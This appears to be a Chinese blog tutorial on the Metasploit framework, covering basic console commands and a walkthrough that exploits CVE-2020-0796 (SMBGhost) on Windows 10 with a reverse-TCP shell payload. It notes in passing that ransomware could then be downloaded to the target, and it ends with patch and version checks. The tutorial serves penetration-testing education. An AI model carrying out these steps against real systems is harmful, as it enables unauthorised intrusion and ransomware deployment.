点击兰花豆说网络安全,了解更多网络安全知识
一、Metasploit简介
Metasploit和Cobalt Strike是两款著名的渗透测试框架,作为网络安全从业人员,有必要做些基本了解和功能的使用,未知攻,焉知防,从攻防对抗的角度去深度理解网络安全问题,首先做好网络安全基础防护,再逐步过渡到高阶对抗。
Metasploit主要是用来利用和验证漏洞,包括社区版和专业版本(可以试用30天,企业邮箱申请),由ruby语言开发为主,官方网站(www.metasploit.com)可以下载,支持Linux、MacOS、windows系统,由H.D.Moore在2003年发布。从此,似乎人人都可以成为黑客了,Metasploit团队一直在开发各种攻击工具。2009年底,Rapid7公司收购metasploit团队,H.D.Moore也加入Rapid7,metasploit迈上一个新台阶。本文简单介绍一下这个框架。
专业版和社区版的功能对比,其实社区版的功能偏少,但是开源的,可以自己增加或修改功能。但是功能足以让从业人员了解渗透基本知识。如下图所示:
二、Metasploit使用方法
1.如何进入msf
一般kali liuix自带Metasploit社区版,通过虚拟机(vmware workstation)安装kali linux(官网www.kali.org下载),做渗透测试建议配置不低于32G内存的PC或服务器。kali安装(建议做好快照)之后打开终端命令行,输入msfdb run就进入metasploit框架,基于postgresql数据库。如下图所示:
输入help,可以查看帮助。
2.常用命令介绍
2.1 connect命令
connect 192.168.6.128 5003,连接本地的资产灯塔ARL,提交get请求,可以查看到服务器的版本号。
2.2 show命令
show -h帮助命令
show exploits 查看攻击模块exp。
show payloads 查看攻击载荷。
show auxiliary 查看辅助攻击载荷。
2.3 search命令
search -h 帮助命令。
search xxx 根据关键字查询search oracle,查询所有与oracle相关的,内容很多。
search name:xxx 根据名称查询search name:oracle,查询名字为oracle的。
search path:xxx 根据路径查询search path:oracle,查看路径中包含oracle的。
search platform:xxx 根据平台查询 search platform:oracle,查看影响此平台的模块。
search type:xxx 根据模块类型查找search type:exploit,查看exp模块。包括这些模块(exploit, payload, auxiliary, encoder, evasion, post, or nop),可以通过search -h帮助命令查看。
search name:xxx type:xxx 多参数联合查找search name:oracle type:exploit,查看类型和名称。
三、msf实战永恒之黑
1.search cve: CVE-2020-0796 type:exploit 查询一下永恒之黑的exp。
2.use 1 加载模块
show options 查看配置项,可以查看该漏洞影响的版本,win10 v1903-1909 x64。还可以查看对应的payload。
set lhost 设置本机IP,lport默认即可。
3.search windows/x64/shell type:payload 找一个好用的payload,并设置set payload windows/x64/shell/reverse_tcp
4.show options查看配置信息
通过set rhosts设置被攻击主机IP,设置完成之后,set defangedmode false,输入exploit,成功进入win10主机,可以通过相关服务下载勒索病毒到win10中。
5.win10永恒之黑存在条件
445端口开启,共享开启。系统版本Windows10 v1903-1909 x64,没有打KB4551762补丁。
查看win10版本和补丁方式
“设置-系统-关于”中查看版本号是否满足要求。
查看补丁systeminfo
查看共享功能是否打开
四、总结
学习Metasploit框架对网络安全从业人员,尤其是售前、售后、产品经理和研发人员来说,具有重要意义。通过掌握这一强大的渗透测试工具,这些专业人员可以深入了解各种渗透攻击的原理和方法,从攻击者的视角审视网络安全问题。这种视角有助于更全面地认识自身产品的潜在安全漏洞,并设计出更加安全的系统架构和防护机制。售前人员可以利用Metasploit演示实际攻击场景,增强客户对安全产品的信任;售后人员则能够迅速复现和分析客户遇到的安全问题,提供高效的解决方案;产品经理可以基于实际攻击手段,制定更具针对性的安全策略和功能需求;研发人员通过实战练习,不仅提高了漏洞利用和修复的技能,还能在开发过程中提前预防安全漏洞的产生。总体而言,学习和掌握Metasploit框架,能够使网络安全从业人员更好地理解和应对现实中的网络威胁,从而提升整个团队的安全防护能力和产品质量。